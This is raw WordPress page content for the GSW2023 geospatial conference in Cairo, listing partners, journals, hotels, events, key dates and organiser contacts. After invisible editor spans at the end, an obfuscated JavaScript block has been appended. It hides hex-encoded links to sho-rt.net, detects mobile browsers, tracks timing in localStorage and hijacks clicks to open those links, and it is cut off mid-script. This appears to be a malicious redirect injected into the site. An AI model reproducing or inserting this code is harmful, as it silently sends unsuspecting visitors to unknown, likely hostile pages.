18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 